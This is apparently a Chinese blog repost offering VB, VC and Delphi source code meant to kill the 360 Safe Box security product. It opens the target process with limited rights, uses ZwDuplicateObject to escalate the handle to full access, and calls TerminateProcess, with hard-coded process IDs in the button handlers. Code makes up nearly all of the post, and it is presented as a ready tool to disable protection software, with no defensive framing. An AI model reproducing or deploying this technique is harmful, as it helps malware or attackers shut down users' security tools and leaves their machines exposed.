干掉360保险箱VB/VC/delphi 源码

本文整理自网络，侵删。

  
干掉360保险箱VB/VC/delphi 源码
VB 源码：
Option Explicit 
Private Declare Function TerminateProcess Lib "kernel32" (ByVal hProcess As Long, ByVal uExitCode As Long) As Long 
Private Declare Function ZwDuplicateObject _ 
               Lib "NTDLL.DLL" (ByVal SourceProcessHandle As Long, _ 
                           ByVal SourceHandle As Long, _ 
                           ByVal TargetProcessHandle As Long, _ 
                           ByRef TargetHandle As Long, _ 
                           ByVal DesiredAccess As Long, _ 
                           ByVal HandleAttributes As Long, _ 
                           ByVal Options As Long) As Long 
Private Declare Function OpenProcess Lib "kernel32.dll" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessID As Long) As Long 
Function FcOpenProcess&(p&) 
Dim ProcessHandle As Long 
Dim Rtn As Long 
ProcessHandle = OpenProcess(&H400, 0, p) 
If ProcessHandle <> 0 Then 
      Rtn = ZwDuplicateObject(-1, ProcessHandle, -1, VarPtr(ProcessHandle), &H1F0FFF, 0, 1) 
      FcOpenProcess = ProcessHandle 
End If 
End Function 
Private Sub Command1_Click() 
Dim ProcessHandle As Long 
ProcessHandle = FcOpenProcess&(1884) 
TerminateProcess ProcessHandle, 0 
End Sub 
/////////////////////// VC 源码
void KillProcess (ULONG dwProcessId) 
{ 
   HMODULE hNTDLL = GetModuleHandle("ntdll.dll"); 
   HANDLE hProcessHandle; 
      
   _ZwDuplicateObject ZwDuplicateObject = 
         (_ZwDuplicateObject) GetProcAddress (hNTDLL, "ZwDuplicateObject"); 
   //打开进程权限要为0x400 
   hProcessHandle = OpenProcess(0x400, FALSE, dwProcessId); 
   if(hProcessHandle != NULL) 
   { 
         //复制句柄 
         ZwDuplicateObject((HANDLE)-1,(PHANDLE)hProcessHandle,(HANDLE)-1,&hProcessHandle,0x1F0FFF,0, 1); 
   } 
   TerminateProcess(hProcessHandle, 0); 
} 
////////////////////////////////////// 
既然VB VC 都有了 也就不差 delphi的了 
///////////////////// 
附上D源码 
///////////////////// 
function ZwDuplicateObject( SourceProcessHandle,SourceHandle ,TargetProcessHandle ,TargetHandle,DesiredAccess ,HandleAttributes,Options: LongInt):LongInt stdcall; external ’NTDLL.DLL’ name ’ZwDuplicateObject’; 
Function FcOpenProcess(p:Longint):Longint; 
var 
Rtn,ProcessHandle:Longint; 
begin 
ProcessHandle := OpenProcess($400, False, p); 
result:=0; 
If ProcessHandle <> 0 Then 
begin 
      Rtn := ZwDuplicateObject(-1, ProcessHandle, -1, Integer(@ProcessHandle), $1F0FFF, 0, 1); 
      result := ProcessHandle 
End; 
End; 
procedure TForm1.Button1Click(Sender: TObject); 
var 
ProcessHandle :Longint; 
begin 
ProcessHandle := FcOpenProcess(3440); 
TerminateProcess( ProcessHandle, 0 ); 
end;
 

相关阅读 >>

判断url的有效性

Delphi 简单字符串截取函数

Delphi中读写txt文件的一段代码

Delphi 判断进程名是否存在，如果存在则结束进程

Delphi以鼠标为中心缩放图片以及拖动（采用区域抠图拉伸的方式）

Delphi字符串、数组操作函数

Delphi获取pid的父进程文件名

Delphi之如何快速开发原生activex控件

Delphi 判断是否出现滚动条

Delphi中控件数组批量赋值

更多相关阅读请进入《Delphi》频道 >>

转载请注明出处：木庄网络博客 » 干掉360保险箱VB/VC/delphi 源码